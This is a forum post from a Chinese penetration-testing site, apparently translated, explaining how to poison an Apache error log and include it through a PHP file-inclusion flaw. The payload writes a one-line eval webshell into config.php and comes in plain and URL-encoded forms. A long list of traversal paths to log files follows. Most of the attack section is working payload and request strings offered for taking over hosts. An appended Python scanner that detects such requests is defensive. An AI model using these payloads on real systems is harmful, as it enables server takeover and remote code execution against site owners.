中国网络渗透测试联盟
Title:
PHP include of the Apache log to write a shell
Author:
admin
Time:
2012-9-15 14:27
Because the method above is very impractical (in my testing the log was often tens of megabytes, which makes it no fun to play with), let's think a step further: we write a real, usable webshell, which is also far better than the painfully slow method above.
For example, still using this one-line trojan:

<?eval($_POST[cmd]);?>
By now you may have realised that this is a pretty good approach. Next, how to write it becomes the question; use this statement:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?> //write the one-line trojan statement into config.php
We submit this statement, let Apache record it in the error log, then include the log and the shell is written successfully. Remember that it must be converted to URL-encoded form, or it will not work.
Converted to:

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
This way the line of code that writes the webshell is recorded in the error log.
Now we include the log again; submit:

http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log
This way the webshell is written successfully, and config.php now contains the one-line trojan statement.

OK.

http://www.xxx.com/forum/config.php
This has become our webshell.

Connect to it directly with lanker's client and the host is yours.
PS: Everything above presumes that the folder permissions are writable; it must be -rwxrwxrwx (777) to proceed, which you can check directly with the directory listed above. Everything above is exploitation in the case where the log path is known.
For other log paths, you can guess, or refer to the list here.

../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
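As an added example from the defender's side (not part of the original post), here is a Python scanner that flags both halves of the technique above in Apache access-log lines: a PHP open tag inside a request (the poisoning step, caught even when percent-encoded) and an include parameter that points at a log file or uses path traversal (the inclusion step). The log lines, client IPs and the parameter name zizzy are constructed sample data.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines in Apache combined format (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Sep/2012:14:27:01 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Sep/2012:14:27:09 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22x.php%22%2C%22w%2B%22%29%3B%3F%3E HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Sep/2012:14:27:20 +0800] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Sep/2012:14:28:00 +0800] "GET /z.php?zizzy=about HTTP/1.1" 200 880 "-" "curl/7.26"
"""

# client ip ... [timestamp] "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:\S+) (\S+) [^"]*"')
PHP_TAG_RE = re.compile(r"<\?")  # PHP open tag (short or long form) after decoding
LOG_PATH_RE = re.compile(r"(\.\./|/log/|/logs/|(access|error)[_.]log\b)", re.I)

def fully_decode(s, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so double encoding cannot hide a tag."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def analyse_line(line):
    """Return a list of (client_ip, reason) findings for one access-log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []  # not a parseable combined-format line
    ip, raw_target = m.group(1), m.group(2)
    findings = []
    # 1. PHP code anywhere in the request target: the log now carries executable code.
    if PHP_TAG_RE.search(fully_decode(raw_target)):
        findings.append((ip, "php_tag_in_request"))
    # 2. A query parameter whose value names a log file or climbs directories.
    for key, value in parse_qsl(urlsplit(raw_target).query, keep_blank_values=True):
        if LOG_PATH_RE.search(fully_decode(value)):
            findings.append((ip, f"log_file_in_param:{key}"))
    return findings

def scan_log(text):
    """Scan a whole log text; returns the findings of every line in order."""
    return [f for line in text.splitlines() for f in analyse_line(line)]

if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(ip, reason)
```

Run over the sample it reports the poisoning request and the log-including request from 10.0.0.9 and stays silent on the two benign lines; the same scan applies to any log that records the request path.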
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2